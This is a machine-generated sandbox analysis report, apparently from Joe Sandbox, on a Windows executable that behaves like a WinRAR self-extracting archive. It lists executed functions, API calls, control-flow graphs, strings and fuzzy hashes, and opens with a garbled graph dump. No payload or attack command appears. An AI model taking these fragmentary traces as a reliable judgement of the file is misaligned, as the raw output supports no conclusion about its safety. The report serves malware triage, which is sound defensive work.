30435 263fcf WaitForSingleObject 30411->30435 30412->30411 30416 263ad9 ShowWindow 30412->30416 30414->30393 30420 263b48 30415->30420 30421 263b3d 30415->30421 30416->30411 30418 263a82 30423 241a66 26 API calls 30418->30423 30420->30408 30427 263b73 ShowWindow 30420->30427 30443 258da4 CompareStringW 30421->30443 30422 263afb 30422->30415 30426 263b08 GetExitCodeProcess 30422->30426 30425 263a8e 30423->30425 30425->30406 30426->30415 30428 263b19 30426->30428 30427->30408 30428->30415 30430->30381 30431->30381 30432->30386 30433->30363 30436 26402f 30435->30436 30437 263fea 30435->30437 30436->30422 30438 263fed PeekMessageW 30437->30438 30439 264020 WaitForSingleObject 30438->30439 30440 263fff GetMessageW TranslateMessage DispatchMessageW 30438->30440 30439->30436 30439->30438 30440->30439 30441->30397 30442->30418 30443->30420 30444->30414 30445 26437d 30446 264389 __EH_prolog3_GS 30445->30446 30447 254318 53 API calls 30446->30447 30448 2643c6 30447->30448 30449 256a25 53 API calls 30448->30449 30450 2643d0 30449->30450 30451 2425a4 26 API calls 30450->30451 30452 2643dc 30451->30452 30453 241a66 26 API calls 30452->30453 30454 2643e4 30453->30454 30455 241de7 SetDlgItemTextW 30454->30455 30456 2643f5 30455->30456 30457 260678 5 API calls 30456->30457 30458 2643fa 30457->30458 30462 264430 30458->30462 30463 2419a9 26 API calls 30458->30463 30459 265787 5 API calls 30460 264446 30459->30460 30462->30459 30463->30462

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 0026454A Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 252filesleeptimeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 383 26454a-264612 call 256d7b call 251309 call 25f4d4 call 2671f0 call 25f89a call 25f84c GetCommandLineW 396 264618-26463c call 2414a7 call 2619ee call 241a66 383->396 397 2646f9-264722 call 2513f9 call 2425a4 call 241a66 383->397 412 264642-264659 OpenFileMappingW 396->412 413 2646dc-2646eb call 2414a7 call 263efc 396->413 410 264724 397->410 411 264729-264831 SetEnvironmentVariableW GetLocalTime call 24f6ba SetEnvironmentVariableW GetModuleHandleW LoadIconW call 2607e5 call 253538 call 25d255 * 2 DialogBoxParamW call 25d347 * 2 397->411 410->411 447 264833-264834 Sleep 411->447 448 26483a-264841 411->448 416 2646d2-2646da CloseHandle 412->416 417 26465b-264669 MapViewOfFile 412->417 426 2646f0-2646f4 call 241a66 413->426 416->397 417->416 420 26466b-264687 UnmapViewOfFile MapViewOfFile 417->420 420->416 423 264689-2646cc call 25fc38 call 263efc call 255109 call 2551bf call 2551f8 UnmapViewOfFile 420->423 423->416 426->397 447->448 449 264843 call 25fb4b 448->449 450 264848-264865 call 255041 DeleteObject 448->450 449->450 454 264867-264868 DeleteObject 450->454 455 26486e-264874 450->455 454->455 456 264876-26487d 455->456 457 26488e-26489c 455->457 456->457 458 26487f-264889 call 2494b8 456->458 459 2648b0-2648bd 457->459 460 26489e-2648aa call 263fcf CloseHandle 457->460 458->457 463 2648e1-2648e5 call 25f53a 459->463 464 2648bf-2648cb 459->464 460->459 469 2648ea-264903 call 265734 463->469 466 2648cd-2648d5 464->466 467 2648db-2648dd 464->467 466->463 470 2648d7-2648d9 466->470 467->463 471 2648df 467->471 470->463 471->463
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00256D7B: GetModuleHandleW.KERNEL32(kernel32,6294DA82), ref: 00256DC7
                                                                                                                                                                              • Part of subcall function 00256D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00256DD9
                                                                                                                                                                              • Part of subcall function 00256D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00256E03
                                                                                                                                                                              • Part of subcall function 00251309: __EH_prolog3.LIBCMT ref: 00251310
                                                                                                                                                                              • Part of subcall function 00251309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002517FB,?,?,\\?\,6294DA82,?,?,?,00000000,0027A279,000000FF), ref: 00251319
                                                                                                                                                                              • Part of subcall function 0025F4D4: OleInitialize.OLE32(00000000), ref: 0025F4ED
                                                                                                                                                                              • Part of subcall function 0025F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0025F524
                                                                                                                                                                              • Part of subcall function 0025F4D4: SHGetMalloc.SHELL32(0029532C), ref: 0025F52E
                                                                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00264608
                                                                                                                                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 0026464F
                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00264661
                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0026466F
                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 0026467D
                                                                                                                                                                              • Part of subcall function 0025FC38: __EH_prolog3.LIBCMT ref: 0025FC3F
                                                                                                                                                                              • Part of subcall function 00263EFC: __EH_prolog3_GS.LIBCMT ref: 00263F03
                                                                                                                                                                              • Part of subcall function 00263EFC: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00263F1B
                                                                                                                                                                              • Part of subcall function 00263EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00263F86
                                                                                                                                                                              • Part of subcall function 002551BF: _wcslen.LIBCMT ref: 002551E3
                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,00295430,00000400,00295430,00295430,00000400,00000000,00000001,?,00000000), ref: 002646CC
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002646D3
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,00289698,00000000), ref: 0026472F
                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0026473A
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00264779
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0026478E
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00264795
                                                                                                                                                                            • LoadIconW.USER32(00000000,00000064), ref: 002647AC
                                                                                                                                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00264803
                                                                                                                                                                            • Sleep.KERNELBASE(00001B58), ref: 00264834
                                                                                                                                                                            • DeleteObject.GDI32 ref: 00264858
                                                                                                                                                                            • DeleteObject.GDI32(13050D28), ref: 00264868
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                              • Part of subcall function 002619EE: __EH_prolog3_GS.LIBCMT ref: 002619F5
                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 002648AA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                                                                                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$0T)$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                            • API String ID: 3142445277-456881295
                                                                                                                                                                            • Opcode ID: 7ea8b135c238997765a928555e1e6f339c38b2d9f0151ebe41c94d76a4555f7b
                                                                                                                                                                            • Instruction ID: e43b6d04ef96ad0e2b19e95fa47e7e6ccdea77e4edef4cfed0336fb50d133656
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ea8b135c238997765a928555e1e6f339c38b2d9f0151ebe41c94d76a4555f7b
                                                                                                                                                                            • Instruction Fuzzy Hash: D091D171624350AFD321BF70EC49B6B77ECAB49701F40082EF98993191EB7498A4CF65
                                                                                                                                                                            Function 0025EBD3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 737 25ebd3-25ebf0 FindResourceW 738 25ebf6-25ec07 SizeofResource 737->738 739 25ecec 737->739 738->739 741 25ec0d-25ec1c LoadResource 738->741 740 25ecee-25ecf2 739->740 741->739 742 25ec22-25ec2d LockResource 741->742 742->739 743 25ec33-25ec48 GlobalAlloc 742->743 744 25ece4-25ecea 743->744 745 25ec4e-25ec57 GlobalLock 743->745 744->740 746 25ecdd-25ecde GlobalFree 745->746 747 25ec5d-25ec7b call 266c70 CreateStreamOnHGlobal 745->747 746->744 750 25ecd6-25ecd7 GlobalUnlock 747->750 751 25ec7d-25ec9f call 25eb06 747->751 750->746 751->750 756 25eca1-25eca9 751->756 757 25ecc4-25ecd2 756->757 758 25ecab-25ecbf GdipCreateHBITMAPFromBitmap 756->758 757->750 758->757 759 25ecc1 758->759 759->757
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00260845,00000066), ref: 0025EBE6
                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EBFD
                                                                                                                                                                            • LoadResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EC14
                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EC23
                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00260845,00000066), ref: 0025EC3E
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0025EC4F
                                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0025EC73
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0025ECD7
                                                                                                                                                                              • Part of subcall function 0025EB06: GdipAlloc.GDIPLUS(00000010), ref: 0025EB0C
                                                                                                                                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0025ECB8
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0025ECDE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                            • String ID: PNG
                                                                                                                                                                            • API String ID: 211097158-364855578
                                                                                                                                                                            • Opcode ID: c0684f626b4d14632a15b5796107c3be16b4beb5f6c246b8557f9cc6ced270e4
                                                                                                                                                                            • Instruction ID: 9d3e5cfbc140815b70dc4d773789a51732cf01740c610015559c5e1cc69eda5f
                                                                                                                                                                            • Opcode Fuzzy Hash: c0684f626b4d14632a15b5796107c3be16b4beb5f6c246b8557f9cc6ced270e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 25319E71210212ABDB15AF31ED4CD2B7FACFF45752B11052AFC09D2261EB31D954CBA4
                                                                                                                                                                            Function 0025355D Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 753COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00258781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,6294DA82,00000007,?,?,?,00258751,?,?,?,?,0000000C,00244426), ref: 0025879D
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025395A
                                                                                                                                                                            • __fprintf_l.LIBCMT ref: 00253AA7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                                                                                                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                                                                                                                            • API String ID: 1796436225-285229759
                                                                                                                                                                            • Opcode ID: 90513545f0f5174151f62756699fc8ba1d0a903d61adae6ffab00b01f77037d5
                                                                                                                                                                            • Instruction ID: a93c06acaeeec571d686edda0712bd253083474603e0bdc4b2dc7385e3d417b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 90513545f0f5174151f62756699fc8ba1d0a903d61adae6ffab00b01f77037d5
                                                                                                                                                                            • Instruction Fuzzy Hash: 4052E571E20249AFDF24DFA8C885AEDB7B4FF04351F50152AEC05EB281E7719A68CB54
                                                                                                                                                                            Function 0024F826 Relevance: 9.1, APIs: 6, Instructions: 139fileCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1018 24f826-24f841 call 2657d8 1021 24f925-24f935 FindNextFileW 1018->1021 1022 24f847-24f84d 1018->1022 1023 24f937-24f946 GetLastError 1021->1023 1024 24f948-24f9fa call 2425c3 call 2414a7 call 25229d call 241a66 call 257c44 * 3 1021->1024 1025 24f851-24f864 FindFirstFileW 1022->1025 1026 24f84f 1022->1026 1027 24f91d-24f920 1023->1027 1031 24f9ff-24fa0a call 265787 1024->1031 1025->1024 1029 24f86a-24f88e call 25169a 1025->1029 1026->1025 1027->1031 1036 24f890-24f897 1029->1036 1037 24f8ac-24f8b6 1029->1037 1040 24f89c-24f8aa FindFirstFileW 1036->1040 1041 24f899 1036->1041 1042 24f8fd-24f900 1037->1042 1043 24f8b8-24f8d3 1037->1043 1040->1037 1041->1040 1042->1024 1048 24f902-24f90b GetLastError 1042->1048 1045 24f8f4-24f8fc call 265726 1043->1045 1046 24f8d5-24f8ee call 2419a9 1043->1046 1045->1042 1046->1045 1052 24f90d-24f910 1048->1052 1053 24f91b 1048->1053 1052->1053 1054 24f912-24f915 1052->1054 1053->1027 1054->1053 1058 24f917-24f919 1054->1058 1058->1027
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024F830
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,00000274,0024F733,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?), ref: 0024F859
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024F8A4
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049,?,00000000), ref: 0024F902
                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,00000274,0024F733,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?), ref: 0024F92D
                                                                                                                                                                            • GetLastError.KERNEL32(?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049,?,00000000), ref: 0024F93A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3831798110-0
                                                                                                                                                                            • Opcode ID: 95704f623133f45202b1b9c7ff1004c1d9b68f5c386cdc91263fc9b4dbf0af4b
                                                                                                                                                                            • Instruction ID: 3bd9f45e65a0b530012d6cb8207b7591cf371bd4ff5f363dd6bbddd2ece16c08
                                                                                                                                                                            • Opcode Fuzzy Hash: 95704f623133f45202b1b9c7ff1004c1d9b68f5c386cdc91263fc9b4dbf0af4b
                                                                                                                                                                            • Instruction Fuzzy Hash: B8515571914619DFCF58DF64D988ADDB7B9BF49320F1402AAE419E3290D730AEA4CF50
                                                                                                                                                                            Function 0024BF3D Relevance: 5.0, APIs: 1, Strings: 1, Instructions: 1497COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0024C342
                                                                                                                                                                              • Part of subcall function 00252095: __EH_prolog3_GS.LIBCMT ref: 0025209C
                                                                                                                                                                              • Part of subcall function 002457C0: __EH_prolog3.LIBCMT ref: 002457C7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3H_prolog3__wcslen
                                                                                                                                                                            • String ID: __tmp_reference_source_
                                                                                                                                                                            • API String ID: 1523997010-685763994
                                                                                                                                                                            • Opcode ID: ae1d18fd723c5b6629fe6a63e14842e9245f08b8140c842218a9177689db30af
                                                                                                                                                                            • Instruction ID: 42e852cbf801b0bb2e402c1f369ab56341e53007ef1984de43bdc729b5cdc100
                                                                                                                                                                            • Opcode Fuzzy Hash: ae1d18fd723c5b6629fe6a63e14842e9245f08b8140c842218a9177689db30af
                                                                                                                                                                            • Instruction Fuzzy Hash: B1D2F47092528A9FDF6DDF78C890BEEBBB4BF05304F14015EE88A97241D774A968CB50
                                                                                                                                                                            Function 0026ECAA Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,0026EC80,00000000,00286F40,0000000C,0026EDD7,00000000,00000002,00000000), ref: 0026ECCB
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0026EC80,00000000,00286F40,0000000C,0026EDD7,00000000,00000002,00000000), ref: 0026ECD2
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0026ECE4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                            • Opcode ID: a8bd8443b8c313b5301c9c0d7fc15e47da0a66b7c80675881fd7daba34974b9a
                                                                                                                                                                            • Instruction ID: 98a128d908f459174a1eb1566f0332bd966e42b8e4ef01e818961da48fe1f693
                                                                                                                                                                            • Opcode Fuzzy Hash: a8bd8443b8c313b5301c9c0d7fc15e47da0a66b7c80675881fd7daba34974b9a
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CE04636010208AFCF116F64EE0CA5C3B29EF00381B211428F9089A122CB36ECA2CB80
                                                                                                                                                                            Function 0025B76F Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                                            • Opcode ID: 8eb0299f73c360de9ee9c122ee12d2c0de4cef626a862fe364ae316bde5baed7
                                                                                                                                                                            • Instruction ID: 958f911b0faafbc7b22f49ad2270296aacbfb1144666f57e3c67e32ac010a7c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 8eb0299f73c360de9ee9c122ee12d2c0de4cef626a862fe364ae316bde5baed7
                                                                                                                                                                            • Instruction Fuzzy Hash: 92E1D4715183458FDB25CF28C889B5BBBE1BF88309F04456DEC889B342D774E958CB9A
                                                                                                                                                                            Function 00260900 Relevance: 95.4, APIs: 43, Strings: 11, Instructions: 935windowfilesleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0026090A
                                                                                                                                                                              • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                              • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00260A18
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00260A57
                                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00260A71
                                                                                                                                                                            • IsDialogMessageW.USER32(?,?), ref: 00260A84
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00260A92
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00260A9C
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00260ADE
                                                                                                                                                                            • GetDlgItem.USER32(?,00000068), ref: 00260B04
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00260B1F
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,0027C6C8), ref: 00260B32
                                                                                                                                                                            • SetFocus.USER32(00000000), ref: 00260B39
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00260C20
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00260C4C
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00260C79
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000011), ref: 00260CD5
                                                                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00260DF9
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260E06
                                                                                                                                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00295430,00000400,00000001,00000001), ref: 00260E85
                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00260EA3
                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00260EDC
                                                                                                                                                                            • WaitForInputIdle.USER32(?,00002710), ref: 00260F0B
                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00260F25
                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00295430,00000400), ref: 00260F61
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00295430,00000400), ref: 00260F6D
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00261072
                                                                                                                                                                              • Part of subcall function 00241E1F: GetDlgItem.USER32(?,?), ref: 00241E34
                                                                                                                                                                              • Part of subcall function 00241E1F: ShowWindow.USER32(00000000), ref: 00241E3B
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000065,0027C6C8), ref: 0026108A
                                                                                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00261093
                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 002610A2
                                                                                                                                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00261422
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00261436
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002610B1
                                                                                                                                                                              • Part of subcall function 0025E265: __EH_prolog3_GS.LIBCMT ref: 0025E26C
                                                                                                                                                                              • Part of subcall function 0025E265: ShowWindow.USER32(?,00000000,00000038), ref: 0025E294
                                                                                                                                                                              • Part of subcall function 0025E265: GetWindowRect.USER32(?,?), ref: 0025E2D8
                                                                                                                                                                              • Part of subcall function 0025E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 0025E373
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0026114F
                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,000103D3), ref: 00261284
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,13050D28), ref: 0026129D
